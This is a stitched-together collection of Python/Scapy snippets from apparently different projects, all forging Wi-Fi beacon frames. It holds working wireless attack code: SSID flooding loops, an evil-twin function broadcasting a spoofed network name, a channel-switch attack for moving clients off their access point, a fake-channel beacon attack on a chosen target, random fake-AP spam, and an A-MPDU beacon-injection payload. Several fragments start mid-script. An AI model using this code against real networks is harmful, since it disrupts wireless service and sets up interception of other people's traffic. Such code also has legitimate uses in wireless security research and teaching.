def send_beacon_ex(essid, interface, privacy=PRIVACY_NONE, bssid=None, channel=6): """ Convenience function for sending beacons without a thread or creating an instance """ if not bssid: bssid = getHwAddr(interface) channel = chr(channel) sequence = randint(1200, 2000) if privacy in [PRIVACY_NONE, 'none', 'NONE']: beacon = ( RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence) / Dot11Beacon(cap='ESS+short-preamble+short-slot') / Dot11Elt(ID="SSID", info=essid) / Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') / Dot11Elt(ID="DSset", info=channel) / Dot11Elt(ID=42, info="\x04") / Dot11Elt(ID=47, info="\x04") / Dot11Elt(ID=50, info="\x0c\x12\x18\x60")) elif privacy in [PRIVACY_WEP, 'wep', 'WEP']: beacon = ( RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence) / Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot') / Dot11Elt(ID="SSID", info=essid) / Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') / Dot11Elt(ID="DSset", info=channel) / Dot11Elt(ID=42, info="\x04") / Dot11Elt(ID=47, info="\x04") / Dot11Elt(ID=50, info="\x0c\x12\x18\x60")) elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']: beacon = ( RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence) / Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot') / Dot11Elt(ID="SSID", info=essid) / Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') / Dot11Elt(ID="DSset", info=channel) / Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01") / Dot11Elt(ID=42, info="\x00") / Dot11Elt(ID=50, info="\x30\x48\x60\x6c") / Dot11Elt( ID=221, info= "\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00" )) else: raise Exception('Invalid privacy setting') sendp(beacon, iface=interface, verbose=False)
def setPrivacy(self, value): """ Configure the privacy settings for None, WEP, and WPA """ if value == PRIVACY_NONE: self.beacon = RadioTap() / Dot11( addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid ) / Dot11Beacon(cap='ESS+short-preamble+short-slot') / Dot11Elt( ID="SSID", info=self.essid) / Dot11Elt( ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') / Dot11Elt( ID="DSset", info=self.channel) / Dot11Elt( ID=42, info="\x04") / Dot11Elt( ID=47, info="\x04") / Dot11Elt( ID=50, info="\x0c\x12\x18\x60") elif value == PRIVACY_WEP: self.beacon = RadioTap() / Dot11( addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid) / Dot11Beacon( cap='ESS+privacy+short-preamble+short-slot') / Dot11Elt( ID="SSID", info=self.essid) / Dot11Elt( ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24' ) / Dot11Elt(ID="DSset", info=self.channel) / Dot11Elt( ID=42, info="\x04") / Dot11Elt( ID=47, info="\x04") / Dot11Elt( ID=50, info="\x0c\x12\x18\x60") elif value == PRIVACY_WPA: self.beacon = RadioTap() / Dot11( addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid ) / Dot11Beacon( cap='ESS+privacy+short-preamble+short-slot' ) / Dot11Elt(ID="SSID", info=self.essid) / Dot11Elt( ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24' ) / Dot11Elt(ID="DSset", info=self.channel) / Dot11Elt( ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01" ) / Dot11Elt( ID=42, info="\x00" ) / Dot11Elt( ID=50, info="\x30\x48\x60\x6c" ) / Dot11Elt( ID=221, info= "\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00" )
def ssidFlood(ssid, senderMAC, channel): dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=senderMAC, addr3=senderMAC) beacon = Dot11Beacon(cap="ESS+privacy") essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) echann = Dot11Elt(ID="DSset", info=chr(channel)) frame = RadioTap()/dot11/beacon/essid/echann sendp(frame, inter=0.1, iface=args.iface, verbose=False, loop=1)
def evilTwin(): fake_mac = RandMAC() evil_twin = RadioTap() / Dot11(type=0, subtype=8, addr1="FF:FF:FF:FF:FF:FF", addr2=fake_mac, addr3=fake_mac) / Dot11Beacon() / Dot11Elt( ID="SSID", info=ssid) while True: sendp(evil_twin, iface=interface, verbose=True)
def dfs_hop_attack(interface: MonitorInterface, ap: AP, essid: str, channel: int): pkt = RadioTap() / Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=ap.bssid, addr3=ap.bssid) / \ Dot11Beacon(cap=0x9104) / Dot11Elt(ID='SSID', info=essid, len=len(essid)) / \ Dot11Elt(ID='RSNinfo', info=( '\x01\x00' # RSN Version 1 '\x00\x0f\xac\x04' # Group Cipher Suite : 00-0f-ac CCMP '\x01\x00' # 2 Pairwise Cipher Suite (next line) '\x00\x0f\xac\x04' # AES Cipher '\x01\x00' # 1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' # Pre-Shared Key '\xcc\x00' # Supports and requires MFP )) / Dot11Elt(ID=37, len=3, info=bytes([0, channel, 1])) while True: interface.inject(pkt) sleep(0.3)
def generateFrame(wifiName, macAddr): ''' Méthode permettant de générer des frames de beacon à partir d'un nom et d'une MAC adresse :wifiName: Le nom du wifi à usurper :macAddr: La mac adresse à incorporer ''' #creation de la frame dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=macAddr, addr3=macAddr) beacon = Dot11Beacon(cap="ESS+privacy") essid = Dot11Elt(ID="SSID", info=wifiName, len=len(wifiName)) frame = RadioTap() / dot11 / beacon / essid return frame
def ssid_packet(): ap_mac = '00:00:00:00:00:00' rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(CHANNEL) + '\xc0\x00\xc0\x01\x00\x00') beacon_packet = Dot11(subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=ap_mac, addr3=ap_mac) \ / Dot11Beacon(cap=0x2105) \ / Dot11Elt(ID='SSID', info="injected SSID") \ / Dot11Elt(ID='Rates', info=AP_RATES) \ / Dot11Elt(ID='DSset', info=chr(CHANNEL)) # Update sequence number beacon_packet.SC = 0x3060 # Update timestamp beacon_packet[Dot11Beacon].timestamp = time.time() mpdu_len = len(beacon_packet) + 4 if mpdu_len % 4 != 0: padding = "\x00" * (4 - (mpdu_len % 4)) # Align to 4 octets else: padding = "" mpdu_len <<= 4 crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF) crc = crc_fun(struct.pack('<H', mpdu_len)) maccrc = dot11crc(str(beacon_packet)) delim_sig = 0x4E #print('a-mpdu: len %d crc %02x delim %02x' % (mpdu_len >> 4, crc, delim_sig)) #hexdump(maccrc) ampdu_header = struct.pack('<HBB', mpdu_len, crc, delim_sig) #hexdump(ampdu_header) data = ampdu_header / beacon_packet / maccrc / padding data /= "\x00\x00\x20\x4e" * 8 data = str(data) return data
def rnd_aps(iface): s = conf.L2socket(iface=iface) rnd_mac = RandMAC() itx = 0 try: while True: s.send( RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=rnd_mac, addr3=rnd_mac, addr4=rnd_mac) / Dot11Beacon(cap="ESS") / Dot11Elt(ID="SSID", info=b"VOTA " + LEL_AP[itx]) / Dot11Elt(ID="Rates", info="\x0c\x12\x18\x24\x30\x48\x60\x6c") / Dot11Elt(ID="DSset", info=chr(1))) itx = (itx + 1) % len(LEL_AP) time.sleep(0.001) except Exception as e: print(e) s.close()
input = wepPkts.__class__(str(wepPkts)[0:-4]) #print(input.summary()) sendp(wepPkts) # Sending a simple packet sender='08:00:27:c6:e4:20' dest='08:00:27:1b:8b:a3' packet=Dot11(addr1=dest,addr2=sender,addr3=sender)/LLC()/SNAP()/IP(src="192.168.3.7",dst="192.168.3.5")/ICMP()/"Hello!" print(packet.summary()) #print(packet.show()) sendp(packet) encPkt = wepEncrypt(packet,'0123456789') print(encPkt.summary()) #print(encPkt.show()) sendp(encPkt) #Sending a Dot11 Beacon packet SSID = 'Test SSID' iface = 'eth0' dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender) beacon = Dot11Beacon() essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID)) frame = RadioTap()/dot11/beacon/essid print(frame.summary()) sendp(frame, iface=iface)
sniff(iface=iface, prn=PacketHandler) # Target selection phase choice = inputNumber("Please select the target (1-%d): " % (len(ap_list)), 1, len(ap_list)) # ATTACK ssid = ap_list[choice - 1] realChannel = ap_ssidToChannel[ssid] # Compute the fake channel (dist of 6 from the real one) fakeChannel = realChannel - 6 if realChannel > 6 else realChannel + 6 print( "Sending a fake beacons with SSID %s, channel %d (real channel is %d) (10/second)" % (ssid, fakeChannel, realChannel)) sender_mac = RandMAC() dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=sender_mac, addr3=sender_mac) # Create Dot11 packet beacon = Dot11Beacon(cap="ESS+privacy") # Add privacy essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) # Add ssid echann = Dot11Elt(ID="DSset", info=chr(fakeChannel)) # Add channel frame = RadioTap() / dot11 / beacon / essid / echann # Create finale frame sendp(frame, inter=0.1, iface=iface, loop=1) # Emit the beacon (10 times per second)
def send_beacon(iface, ssid, mac_address, count, list_path): if count is None: count = 1 if ssid is None: ssid = random_mac() if mac_address is None: mac_address = random_mac() if list_path is not None: file = open(list_path) data = json.load(file) for single_count in range(0, count): for single_data in data: dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2='22:22:22:22:22:22', addr3=single_data['mac']) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID', info=single_data['ssid'], len=len(single_data['ssid'])) rsn = Dot11Elt(ID='RSNinfo', info=( '\x01\x00' '\x00\x0f\xac\x02' '\x02\x00' '\x00\x0f\xac\x04' '\x00\x0f\xac\x02' '\x01\x00' '\x00\x0f\xac\x02' '\x00\x00')) frame = RadioTap() / dot11 / beacon / essid / rsn frame.show() sendp(frame, iface=iface, count=1) if list_path is None: dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2='22:22:22:22:22:22', addr3=mac_address) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid)) rsn = Dot11Elt(ID='RSNinfo', info=( '\x01\x00' '\x00\x0f\xac\x02' '\x02\x00' '\x00\x0f\xac\x04' '\x00\x0f\xac\x02' '\x01\x00' '\x00\x0f\xac\x02' '\x00\x00')) frame = RadioTap() / dot11 / beacon / essid / rsn frame.show() sendp(frame, iface=iface, count=count)